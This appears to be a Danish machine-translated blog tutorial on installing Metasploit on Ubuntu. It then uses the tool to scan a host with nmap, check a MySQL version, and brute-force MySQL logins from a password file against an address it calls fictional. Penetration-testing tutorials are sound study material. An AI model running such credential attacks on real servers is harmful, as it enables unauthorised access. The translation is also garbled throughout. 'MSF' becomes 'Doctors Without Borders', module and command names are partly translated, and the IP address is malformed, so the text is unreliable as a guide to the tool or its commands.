Metasploit -ramme til test af serversikkerhed

Indholdsfortegnelse
Metasploit Framework, er en værktøj til at udvikle og køre exploits mod en computer eller server. Metasploit Framework er skrevet på Ruby -sproget, det er multiplatform og kræver en kraftfuld computer for at køre, der er en betalt version og en gratis version til fællesskabet.
Den kan downloades på www.metasploit.com/framework/download
Vi skal installere i Linux Ubutnu, men det fungerer for andre distros ved at ændre nogle kommandoer.
Vi får adgang til terminalvinduet og installerer rubin, før det fungerede med perl, men det var programmeret helt nyt.
Vi installerer rubinafhængighederne, så vi derefter kan køre rammerne.
 sudo apt-get install ruby ​​libruby rdoc sudo apt-get install libyaml-ruby sudo apt-get install libzlib-ruby sudo apt-get install libopenssl-ruby sudo apt-get install libdl-ruby sudo apt-get install libreadline-ruby sudo apt -get install libiconv-ruby sudo apt-get install rubygems * sudo apt-get install libgtk2-ruby libglade2-ruby 

Afhængigt af den version, vi downloader 32 eller 64 bit fra termink, giver vi tilladelse:
chmod + x metasploit-latest-linux-x64-installer.run

Vi kører installationsprogrammet, og installationsvinduet åbnes:
sudo metasploit-latest-linux-x64-installer.run

Vi skal klikke på følgende Fordward), vi definerer, om den skal installeres som en tjeneste og den port, den skal indtage, som standard bruger den 3790.
I slutningen af ​​installationen fra terminalvinduet og med root -adgang opdaterer vi rammerne
med kommandoen:
msfupdate

Metasploit er et program uden et grafisk miljø, der kører fuldstændigt i terminalen. Vi får adgang til softwaren fra terminalen med kommandoen:
msfconsole

At kende Læger uden Grænser internt
Læger uden Grænser (Metasploit Framework) Det er struktureret i en række moduler som:

Udnytter Hvad er de scripts og programmer, der er tilgængelige i Læger uden Grænser, og som vi kan bruge, de er organiseret efter operativsystem og kategorier, for eksempel exploits / windows / browser / som er de exploits, der er tilgængelige for browsere, der kører på Windows.

Nyttelast: Det er handlingen, der vil blive udført, hvis sårbarheden, som vi tester, kan findes og udnyttes.

Hjælpemiddel: hjælpeskriptene med forskellige funktioner, f.eks. hjælpe / scanner / portscan / tcp og ved hjælp af denne tcp -portscanner, ville vi få portstatus. Dette script er et alternativ til Nmap.

Undrer: De koder script til at undgå noget antivirus og antispammer.

Vi starter et testeksempel fra den terminal, vi udfører:
./msfconsole

Metsploit -prompten er msf> derfra udfører vi alt, og for at afslutte skriver vi bare exit
Vi starter med at scanne en ip med nmap
msf> nmap -sV 190.155.80.110

Vi aktiverer hjælpemodulet for at få adgang til scriptværktøjerne, der gør det muligt at arbejde på mysql. Vi kan også se versionen af ​​modulet.

Vi scanner versionen af mysqlaf indlysende årsager er ip'en fiktiv og kun af eksemplet:
 msf> auxiliary (mysql_version)> sæt RHOSTS 190.155.80.110 // indstil den eksterne ip msf> indstil RHOSTS 192.155.80.110 msf> auxiliary (mysql_version)> kør // tjek mysql -versionen 

Hvis den udføres korrekt, kan den returnere mysql -versionen:
[*] 190.155.80.110 kører Mysql5.0

En anden sag med scanningsmodulet og forsøg på at ændre root -brugeren af ​​mysql:
 msf> brug scanner / mysql / mysql_login msf> indstil BRUGERNAME admin msf> indstil PASS_FILE /tmp/keys.lst // tekstfil med mulige nøgler en under den anden msf> exploit 

Hvis det virker, kan vi logge ind på mysql:
mysql -h 1920,155,80,110 -u admin -pkey

Du vil bidrage til udviklingen af ​​hjemmesiden, at dele siden med dine venner

wave wave wave wave wave